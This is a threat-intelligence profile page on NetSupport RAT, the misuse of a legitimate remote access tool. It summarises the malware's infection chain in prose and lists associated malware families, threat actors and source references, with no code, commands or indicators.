Netsupport

Malware updated 14 days ago (2024-10-03T23:01:53.830Z)
Download STIX
Preview STIX
NetSupport is a legitimate remote access software that has been exploited as a malware tool by various threat actors. It's often used in combination with other malicious software like BlackBasta Ransomware, IcedID, and occasionally Lumma Stealer, the most common infostealer in the world today. The malware can infect systems through suspicious downloads, emails, or websites, often without user awareness. Once inside, it can steal personal information, disrupt operations, or even hold data hostage for ransom. Notably, NetSupport was used during a Royal ransomware attack and has been employed by former ITG23 members and affiliates in their cyberattacks. The infection process of NetSupport RAT (Remote Access Trojan) is multi-staged and begins with the downloading of a JavaScript file from a malicious website. This initial file retrieves, downloads, and runs NetSupport RAT through several stages of other JavaScript payloads. Ultimately, a ZIP archive containing all necessary files to run NetSupport RAT is downloaded, extracted, and run on the victim's computer. Once operational, NetSupport RAT beacons out to a command and control (C2) server, notifying threat actors that the PC is ready for unauthorized access. Detection and monitoring of such attacks are possible through tools like InsightIDR Attacker Behavior Analytics. These tools can identify suspicious processes and modifications of files, indicative of an attacker's activity. For instance, in one observed case, the attacker used the 7zip compression utility and the NetSupport Manager remote access tool. It's crucial to remember that while NetSupport RAT is used for malicious purposes in these instances, NetSupport itself is a legitimate remote software company. The malware emails analyzed in these scenarios are often basic yet manage to bypass email security systems.
Description last updated: 2024-10-03T22:15:34.838Z
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at. Create a free account to see the source evidence for each alias, and help fix any errors.
Alias DescriptionVotes
Netsupport Rat is a possible alias for Netsupport. NetSupport RAT is a malicious software (malware) that poses a significant threat to organizational safety. The malware, which can be spread through suspicious downloads, emails, or websites, infiltrates systems without detection and has the potential to steal personal information, disrupt operations
5
Netsupport Manager is a possible alias for Netsupport. NetSupport Manager is a malicious software (malware) that poses significant threats to computer systems and networks. It is often disguised as legitimate software or tools, such as the 7-zip compression utility or a fake Chrome browser update, to trick users into downloading and installing it. Once
4
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Malware
Rat
Ransomware
Windows
Vulnerability
Exploit
Infostealer
Wordpress
Tool
Trojan
Phishing
Payload
Analyst Notes & Discussion
Be the first to leave your mark here! Log in to share your views and vote.
Associated Malware
To see the evidence that has resulted in these malware associations, create a free account
Alias DescriptionAssociation TypeVotes
The QakBot Malware is associated with Netsupport. Qakbot is a potent piece of malware, or malicious software, that infiltrates computer systems through suspicious downloads, emails, or websites. Once installed, it can steal personal information, disrupt operations, or even hold data hostage for ransom. This malware, built by various groups includinUnspecified
3
The Darkgate Malware is associated with Netsupport. DarkGate is a multifunctional malware known for its capabilities in information and credential stealing, cryptocurrency theft, and ransomware delivery. A recent campaign has seen it exploit a zero-day vulnerability in Microsoft Windows, allowing it to infiltrate systems undetected. DarkGate can be dUnspecified
3
The Lumma Stealer Malware is associated with Netsupport. Lumma Stealer is a highly sophisticated malware variant known for its extensive data-harvesting capabilities. It is designed to steal sensitive information such as passwords, card details, cryptocurrency wallets, and browser session cookies from infected devices. Lumma Stealer employs a DLL side-loaUnspecified
2
The IcedID Malware is associated with Netsupport. IcedID is a type of malware, malicious software designed to exploit and damage computer systems. It has been identified in association with various other malwares such as Qakbot, BazarLoader, CobaltStrike, Conti, Gozi, Trickbot, Quantum, Emotet, and Pikabot. The IcedID IntBot Loader (int-bot.dll) isUnspecified
2
The Vidar Malware is associated with Netsupport. Vidar is a malicious software (malware) that operates as an infostealer, primarily targeting Windows-based systems. It's written in C++ and is based on the Arkei stealer. Vidar is part of a broader landscape of malware threats such as Emotet, IcedID, CobaltStrike, SVCReady, CargoBay, Pushdo, Minodo,Unspecified
2
The Socgholish Malware is associated with Netsupport. SocGholish is a malicious software (malware) that has been significantly prevalent in cyber threats over recent years. In 2022, it was observed being used in conjunction with the Parrot TDS to deliver the FakeUpdates downloader to unsuspecting visitors on compromised websites. By late 2022, MicrosofUnspecified
2
Associated Threat Actors
To see the evidence that has resulted in these threatActor associations, create a free account
Alias DescriptionAssociation TypeVotes
The Battleroyal Threat Actor is associated with Netsupport. BattleRoyal, a threat actor group, has been observed using a variety of attack channels to deliver the DarkGate remote access trojan (RAT). These include phishing emails, fake browser updates, traffic distribution systems (TDSs), malicious VBScript, steganography, and notably, a Windows SmartScreen Unspecified
3
The FIN7 Threat Actor is associated with Netsupport. FIN7, also known as Carbanak, Carbon Spider, Cobalt Group, and Navigator Group, is a notorious cybercrime group that has been active since 2012. The group is recognized for its advanced combination of malware and social engineering tactics, having executed numerous successful attacks against global Unspecified
2
Source Document References
Information about the Netsupport Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
PreviewSource LinkCreatedAtTitle
BankInfoSecurity
14 days ago
DARKReading
21 days ago
CERT-EU
7 months ago
DARKReading
4 months ago
SANS ISC
4 months ago
DARKReading
7 months ago
CERT-EU
7 months ago
CERT-EU
10 months ago
CERT-EU
8 months ago
CERT-EU
9 months ago
Trend Micro
2 years ago
SecurityIntelligence.com
a year ago
CERT-EU
a year ago
CERT-EU
a year ago
CERT-EU
a year ago
InfoSecurity-magazine
a year ago
CERT-EU
a year ago
CERT-EU
a year ago
CERT-EU
9 months ago
CERT-EU
10 months ago